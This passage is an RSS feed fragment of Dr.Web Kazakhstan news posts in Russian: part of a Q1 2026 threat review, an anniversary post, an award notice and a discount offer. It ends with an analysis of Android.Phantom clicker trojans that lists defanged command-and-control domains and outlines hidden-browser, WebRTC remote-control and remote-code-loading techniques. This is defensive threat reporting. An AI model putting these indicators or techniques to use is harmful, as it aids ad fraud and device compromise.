&lt;p&gt;В I квартале 2026 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, сократилось на 31,51% по сравнению с IV кварталом минувшего года. Снижение произошло на фоне новогодних праздников и связанных с ними продолжительных выходных, в течение которых ряд киберпреступников мог приостановить активность и уйти на каникулы. При этом пользователи, которые все же пострадали от атак троянов-шифровальщиков в этот период, могли не сразу среагировать на произошедшие инциденты.&lt;/p&gt;

&lt;p&gt;Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные энкодеры I квартала 2026 года&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15,59% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Encoder.29750&amp;lng=kk"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,23% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 3,23% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Encoder.26996&amp;lng=kk"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1,62% обращений пользователей&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383 &lt;/b&gt; — 1,61% обращений пользователей&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;За минувшие 3 месяца интернет-аналитики компании «Доктор Веб» выявили ряд новых поддельных сайтов маркетплейсов. На них злоумышленники предлагают принять участие в «распродаже» якобы невыкупленных заказов. Мошенническая схема заключается в следующем: «невостребованные» товары из заказов разделены на различные категории (электроника, одежда, обувь, косметика и т. д.) и якобы собираются в соответствующие коробки-сюрпризы. Их содержимое неизвестно и может включать, в том числе, дорогие вещи. При этом такие коробки потенциальным жертвам предлагается купить за относительно невысокую стоимость, что и является главной приманкой.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт маркетплейса обещает «распродажу невостребованных заказов», которые якобы переполняют склады&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Когда пользователь выбирает одну из коробок, ему предлагается оформить заказ и указать персональные данные, которые могут включать имя и фамилию, номер мобильного телефона и адрес электронной почты. Затем он перенаправляется на страницу оплаты через СБП. В итоге жертва лишается денег и передает мошенникам конфиденциальные сведения.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;После оформления «заказа» жертве предлагается оплатить его через Систему быстрых платежей&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши эксперты также выявили множество сайтов сервисов, предлагающих различные финансовые услуги, например — возможность оперативного получения микрозайма, кредита или прохождения процедуры банкротства. Такие сервисы сами не предоставляют эти услуги, как того ожидают пользователи, и являются лишь посредниками между клиентами и финансовыми организациями. Они на платной основе дают доступ к подборке потенциально подходящих вариантов, в то время как агрегация подобных финансовых предложений доступна в бесплатных источниках. Более того, эти сервисы не гарантируют успешный результат при подаче заявки. В то же время, оплата доступа является не единовременной и представляет собой платную подписку с периодическим списанием денег.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из веб-сайтов, где доступ к сервису по подбору финансовых предложений является платным и оформляется в виде подписки&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В некоторых случаях подобные ресурсы могут вводить пользователей в заблуждение, предлагая одну услугу, например — трудоустройство, но фактически предоставлять по подписке доступ к тем же финансовым предложениям по получению кредитов, микрозаймов и т. д.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Веб-сайт обещает помощь в поиске работы, но после оплаты доступа к сервису вместо списка вакансий может предоставить финансовые предложения от партнеров на получение кредита, микрозайма и т. п.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Среди выявленных в I квартале фишинговых сайтов встречались поддельные интернет-ресурсы благотворительного спортивного забега «Зеленый марафон». На них посетителям предлагается зарегистрироваться для участия в марафоне, однако эти сайты не имеют отношения к мероприятию и созданы для сбора конфиденциальных данных пользователей.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из поддельных сайтов забега «Зеленый марафон»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Интернет-аналитики «Доктор Веб» также выявили очередные поддельные сайты инвестиционных сервисов, якобы имеющих отношение к различным кредитным организациям. Среди них были сайты, ориентированные на аудиторию из России, Казахстана и других стран. Мошенники обещают потенциальным жертвам высокую прибыль и для «доступа» к псевдоинвестиционным платформам просят пройти короткий опрос и зарегистрировать учетную запись, указав персональную информацию.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример фишингового сайта, который злоумышленники выдают за официальный ресурс инвестиционного сервиса одного из российских банков&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример фишингового сайта, который злоумышленники выдают за официальный ресурс инвестиционного сервиса одной из кредитных организаций Казахстана&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.kz/dangerous_urls/"&gt;Узнайте больше о нерекомендуемых антивирусом Dr.Web сайтах&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Вредоносное и нежелательное ПО для мобильных устройств&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в I квартале 2026 года продолжился рост активности банковских троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, который наблюдался в IV квартале минувшего года. Наиболее распространенными среди них стали представители подсемейства &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. В то же время вновь сократилось число детектирований рекламных троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Среди выявленного потенциально опасного ПО лидировали программы, в которые при помощи инструментов для моддинга внедрен мусорный код (детектируются как &lt;a href="https://vms.drweb.kz/search/?q=Tool.Obfuscator.TrashCode&amp;lng=kk"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Такая методика в настоящее время активно применяется для защиты банковских троянов от обнаружения антивирусами. Кроме того, по-прежнему распространенными были приложения, модифицированные при помощи утилиты NP Manager (детектируются как &lt;a href="https://vms.drweb.kz/search/?q=Tool.NPMod&amp;lng=kk"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Наиболее часто детектируемым нежелательным ПО стали поддельные антивирусы &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, которые для «лечения» якобы выявленных угроз требуют приобрести полную версию. Самым активным рекламным ПО в I квартале оказались программы &lt;a href="https://vms.drweb.kz/search/?q=Adware.Bastion&amp;lng=kk"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; и &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Первые представляют собой приложения-оптимизаторы, которые создают уведомления с сообщениями о якобы нехватке памяти и ошибках системы, чтобы показывать рекламу во время «оптимизации». Вторые являются поддельными чит-программами для получения различных ресурсов в играх, но в действительности лишь загружают веб-сайты с рекламой.&lt;/p&gt;

&lt;p&gt;В январе 2026 года наша антивирусная лаборатория &lt;a href="https://news.drweb.kz/show/?i=15110" target="_blank"&gt;предупредила&lt;/a&gt; о троянах-кликерах &lt;b&gt;Android.Phantom&lt;/b&gt;. Эти вредоносные приложения используют машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах. Киберпреступники распространяли их сразу несколькими способами: через каталог GetApps для устройств Xiaomi, Telegram-каналы, серверы Discord, сторонние сборники ПО и через вредоносные сайты.&lt;/p&gt;

&lt;p&gt;В течение минувших 3 месяцев вирусные аналитики «Доктор Веб» выявили в каталоге Google Play новые угрозы, среди которых были троянские приложения &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.Subscription&amp;lng=kk"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, предназначенные для подписки пользователей на платные услуги.&lt;/p&gt;

&lt;p&gt;Наиболее заметные события, связанные с «мобильной» безопасностью в I квартале&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Банковские трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; стали самыми распространенными угрозами для Android-устройств&lt;/li&gt;
    &lt;li&gt;Киберпреступники чаще использовали утилиты для моддинга Android-приложений, чтобы защитить банковские трояны от обнаружения антивирусами&lt;/li&gt;
    &lt;li&gt;Продолжилась тенденция к снижению активности рекламных троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Пользователям угрожали трояны &lt;b&gt;Android.Phantom&lt;/b&gt;, использующие машинное обучение и видеотрансляции для накрутки кликов на веб-сайтах&lt;/li&gt;
    &lt;li&gt;В каталоге Google Play вновь распространялись вредоносные приложения&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в I квартале 2026 года читайте в &lt;a href="https://news.drweb.kz/show/review/?i=15136" target="_blank"&gt;нашем обзоре&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15131&amp;lng=kk</guid><title>«Доктор Веб — Центральная Азия» отмечает 20 лет работы в Казахстане</title><link>https://news.drweb.kz/show/?i=15131&amp;lng=kk&amp;c=5</link><pubDate>Sun, 29 Mar 2026 11:18:05 GMT</pubDate><description>&lt;h3&gt;&lt;newslead&gt;29 марта 2026 года компания «Доктор Веб — Центральная Азия» отмечает 20-летие работы в Казахстане. Мы поздравляем всех сотрудников, партнеров и клиентов с этой знаменательной датой!&lt;/newslead&gt;&lt;/h3&gt;&lt;p&gt;В 2006 году мы открыли филиал в Казахстане. Тогда это был локальный офис продаж с технической поддержкой на местах. Прошло много лет, и мы превратились в стратегического партнера крупнейших государственных и коммерческих структур страны, а наши решения ежедневно используют сотни организаций и миллионы людей. Мы защищали от киберугроз такие важные и знаковые для Казахстана проекты, как 7-е зимние Азиатские игры 2011 года, 28-я Всемирная зимняя Универсиада 2017 года, EXPO-2017.&lt;/p&gt;&lt;p&gt;За 20 лет работы мы достигли впечатляющих результатов:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;защитили свыше 2 000 000 устройств в Казахстане;&lt;/li&gt;&lt;li&gt;отразили миллионы атак;&lt;/li&gt;&lt;li&gt;создали 100% локальную техническую поддержку.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;И это не предел. Впереди нас ждут новые вызовы и достижения, горизонты и победы. Наша миссия остается неизменной — обеспечивать спокойствие граждан и процветание бизнеса в стремительно меняющемся цифровом пространстве, а также защитить цифровой суверенитет Казахстана при любых обстоятельствах. Еще раз поздравляем всех причастных и даем слово нашим уважаемым партнерам:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;С «Доктор Веб — Центральная Азия» нас связывает не просто рабочее взаимодействие, а устойчивое партнерство, которое за годы стало по-настоящему комфортным и понятным с обеих сторон.&amp;nbsp;&lt;br&gt;В работе всегда чувствуется вовлеченность команды и готовность искать решения — это редкое и ценное качество.&lt;br&gt;Отдельно хочется отметить, что решения Dr.Web стабильно показывают отличные результаты в проектах наших партнеров и заслуженно пользуются доверием на рынке.&lt;br&gt;Нам важно и приятно развивать это сотрудничество, вместе усиливая позиции на рынке кибербезопасности в Казахстане.&lt;br&gt;Поздравляем с 20-летием! Пусть впереди будет еще больше сильных проектов, роста и поводов для гордости.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Маргарита Ларионова, руководитель отдела Дистрибуции ТОО «ИнфоСофтПром»&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;p&gt;От имени нашей компании примите искренние поздравления с важной и значимой датой — 20-летием успешной работы компании «Доктор Веб — Центральная Азия» на рынке Республики Казахстан!&lt;br&gt;За эти годы ваша команда зарекомендовала себя как надежный и профессиональный партнер, вносящий весомый вклад в развитие информационной безопасности в регионе. Ваши решения и экспертиза помогают бизнесу и государственным организациям эффективно защищать свои цифровые ресурсы и уверенно двигаться вперед в условиях стремительно развивающихся технологий.&lt;br&gt;Мы высоко ценим наше многолетнее сотрудничество и уверены, что впереди нас ждет еще больше совместных достижений, новых проектов и укрепления партнерских отношений.&lt;br&gt;Желаем вашей компании дальнейшего устойчивого роста, инновационного развития, расширения присутствия на рынке и новых профессиональных побед! Пусть ваша команда и дальше достигает высоких результатов, а доверие клиентов только укрепляется.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Нугманов М.К., Вице-президент ТОО «VENDER» (AL-Style)&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;p&gt;Для нас компания «Dr. Web — Центральная Азия» — это надежный и стратегический партнер, с которым можно уверенно развивать бизнес, реализовывать амбициозные проекты и строить долгосрочные планы.&lt;br&gt;Наше сотрудничество продолжается уже на протяжении 15 лет, и за это время мы вместе прошли значимый путь, достигнув высоких результатов. Особенно хотим отметить успешную работу в направлении обеспечения информационной безопасности и продукты «Dr.Web Enterprise Security Suite», которые зарекомендовали себя как эффективные и востребованные решения на рынке.&lt;br&gt;Благодаря совместной работе нам удалось реализовать ряд важных проектов, укрепить позиции на рынке и выстроить доверительные отношения, основанные на профессионализме и взаимной поддержке.&lt;br&gt;Мы искренне ценим наше сотрудничество и гордимся тем, что являемся частью этой 20-летней истории успеха. Ваша команда — это пример экспертизы, надежности и стремления к постоянному развитию в сфере кибербезопасности.&lt;br&gt;От всей души желаем вам дальнейшего устойчивого роста, укрепления лидерских позиций, расширения продуктового портфеля и новых значимых достижений. Пусть впереди вас ждут еще многие годы успешной работы, надежных партнерств и ярких побед!&lt;/p&gt;&lt;p&gt;&lt;strong&gt;ТОО «Comportal»&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;p&gt;В начале 2000-х молодая российская компания «Доктор Веб» начала выходить на международные рынки, и одним из первых шагов стало открытие представительства в Казахстане. С тех пор «Доктор Веб» активно развивает бизнес в Центральной Азии, и мы рады быть частью этого пути.&lt;br&gt;Мы гордимся нашим многолетним сотрудничеством и тем, что вместе движемся вперед, адаптируясь к изменениям и открывая новые возможности для наших партнеров.&lt;br&gt;Желаем компании «Доктор Веб – Центральная Азия» процветания, устойчивого роста и многих лет успешной работы!&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Команда MONT TECH Казахстан&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15134&amp;lng=kk</guid><title>Решение для защиты персональных компьютеров Dr.Web получило награду SKD AWARDS</title><link>https://news.drweb.kz/show/?i=15134&amp;lng=kk&amp;c=5</link><pubDate>Tue, 24 Mar 2026 12:26:39 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Решение для защиты персональных компьютеров &lt;a href="https://products.drweb.ru/win/security_space?os=windows32#ss_demo"&gt;Dr.Web Security Space&lt;/a&gt; в очередной раз было отмечено отраслевой премией SKD AWARDS. Dr.Web Security Space был признан лучшим в категории «Антивирусы для ПК».&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Для «Доктор Веб» это уже третья подобная награда подряд. В &lt;a href="https://news.drweb.ru/show/?i=14677&amp;amp;lng=ru"&gt;2023&lt;/a&gt; году Dr.Web Security Space 12.0 для Windows выиграл в категории «Безопасность персональных компьютеров», в &lt;a href="https://news.drweb.ru/show/?i=14800"&gt;2024&lt;/a&gt; антивирусное решение для персональных компьютеров вновь было признано лучшим, а Dr.Web Mobile Engine SDK победил в категории «Антивирусные движки».&amp;nbsp;&lt;/p&gt;&lt;p&gt;SKD AWARDS — это ежегодная премия, проводимая SKD Labs, всемирно известной независимой лабораторией тестирования и сертификации в области информационной безопасности. Неофициально эту премию называют «Оскар для продуктов кибербезопасности» и рассматривают в качестве одного из важных показателей при оценке эффективности специализированных продуктов.&amp;nbsp;&lt;/p&gt;&lt;p&gt;В рамках премии, продукты проходят серию тестов, в ходе которых оцениваются их функциональность, производительность, технические инновации, поведение в реальных сценариях, способность обнаружения угроз и реагирование на них.&amp;nbsp;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15130&amp;lng=kk</guid><title>Скидка 20% в честь праздника Наурыз и 20-летия работы «Доктор Веб» в Казахстане</title><link>https://news.drweb.kz/show/?i=15130&amp;lng=kk&amp;c=5</link><pubDate>Fri, 20 Mar 2026 10:00:29 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;29 марта исполняется 20 лет нашей работы в Казахстане. В честь дня рождения компании, а также весеннего праздника Наурыз мы запустили акцию — скидка 20% на продукты Dr.Web для персонального использования.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Скидка распространяется на продукты:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;Dr.Web Security Space,&lt;/li&gt;&lt;li&gt;Dr.Web Security Space для мобильных устройств,&lt;/li&gt;&lt;li&gt;Dr.Web Katana,&lt;/li&gt;&lt;li&gt;Dr.Web Family Security.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Срок проведения акции: с 20 по 30 марта 2026 года включительно.&lt;br&gt;Успейте воспользоваться выгодным предложением и подарить себе и своим близким надежную защиту в цифровом пространстве!&lt;/p&gt;&lt;p&gt;&lt;a class="btn" href="https://www.drweb.kz/landing/bday20"&gt;Купить со скидкой&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15110&amp;lng=kk</guid><title>Трояны семейства Android.Phantom проникают в смартфоны вместе с играми и пиратскими модами популярных приложений. Они используют машинное обучение и видеотрансляции для накрутки кликов</title><link>https://news.drweb.kz/show/?i=15110&amp;lng=kk&amp;c=5</link><pubDate>Wed, 21 Jan 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 января 2026 года&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Специалисты антивирусной лаборатории «Доктор Веб» обнаружили и исследовали новое семейство троянов с функциональностью кликера. Их объединяет одна особенность: они либо управляются с сервера &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, либо загружаются и выполняются по команде с него. Вредоносное ПО данного типа заражает смартфоны на ОС Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Один из каналов распространения троянов — официальный каталог приложений для устройств Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Нам удалось отследить несколько мобильных игр, которые содержат вредоносное ПО: Creation Magic World (более 32 тыс. скачиваний), Cute Pet House (&amp;gt;34 тыс. скачиваний), Amazing Unicorn Party (&amp;gt;13 тыс. скачиваний), Академия мечты Сакура (&amp;gt;4 тыс. скачиваний), Theft Auto Mafia (&amp;gt;61 тыс. скачиваний), Open World Gangsters (&amp;gt;11 тыс. скачиваний). Все зараженные игры выложены от лица одного разработчика, SHENZHEN RUIREN NETWORK CO., LTD., троянцы вшиты в них и запускаются вместе с приложениями.&lt;/p&gt;&lt;p&gt;В первоначальных версиях игр вредоносного ПО не было. 28/29 сентября разработчик публикует обновления для игр, в которые встроен троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Он работает в двух режимах, которые в коде программы условно называются режим сигнализации (signaling) и фантом (phantom).&lt;/p&gt;&lt;p&gt;В режиме phantom вредоносное ПО использует скрытый от пользователя встроенный браузер на основе виджета WebView. В него по команде с сервера &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt; загружается целевой сайт для накрутки кликов и файл JavaScript «phantom». Последний содержит в себе сценарий для автоматизации действий на рекламных объявлениях загруженного сайта и фреймворк машинного обучения TensorFlowJS. Модель для этого фреймворка загружается с сервера &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; в директорию приложения. В сценариях для работы с некоторыми видами рекламы&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;размещает браузер на виртуальном экране и делает скриншоты. Троян анализирует их с помощью модели для фреймворка TensorFlowJS, а затем кликает по обнаруженным элементам.&lt;/p&gt;&lt;p&gt;В альтернативном режиме signaling троянец подключается к стороннему серверу при помощи WebRTC. Эта технология позволяет браузерам и приложениям устанавливать прямое соединение для обмена данными, аудио и видео в режиме реального времени без установки дополнительного ПО. В режиме signaling уже упомянутый &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; выполняет роль сигнального сервера, устанавливающий соединения между узлами WebRTC. Также данный сервер определяет режим работы трояна, phantom или signaling. Задачи с целевыми сайтами приходят от &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Далее&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;тайно от пользователя транслирует злоумышленникам видео виртуального экрана с загруженным в браузер сайтом. Троянец дает возможность подключенному узлу WebRTC удаленно управлять браузером на виртуальном экране: кликать, скроллить, вводить или вставлять текст в форму для ввода.&lt;/p&gt;&lt;p&gt;15/16 октября вышеуказанные игры получили еще одно обновление. В дополнение к&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;в них встроили модуль&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Он является дроппером, который содержит внутри себя загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Эта программа загружает еще несколько троянов, предназначенных для имитации кликов на различных сайтах. Эти модули проще кликера&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;— они не используют машинное обучение или видеотрансляции, а руководствуются сценариями для кликов, написанных на JavaScript.&lt;/p&gt;&lt;p&gt;Чтобы использовать технологию WebRTC на Android, трояну необходимо подключить специальную библиотеку с Java API, которая не входит в состав стандартной ОС и скачанных приложений. Поэтому поначалу троян работал преимущественно в режиме phantom. С добавлением в приложения&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, троян&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;получил возможность использовать загрузчик удаленного кода&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.4.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;для загрузки необходимой библиотеки.&lt;/p&gt;&lt;p&gt;Злоумышленники используют также и другие каналы распространения троянов&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.2.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;и&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Phantom.5&amp;lng=kk"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. К примеру, моды музыкального стриминга Spotify с разблокированными premium функциями. Они размещаются на различных сайтах, вот несколько примеров:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Сайт Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col 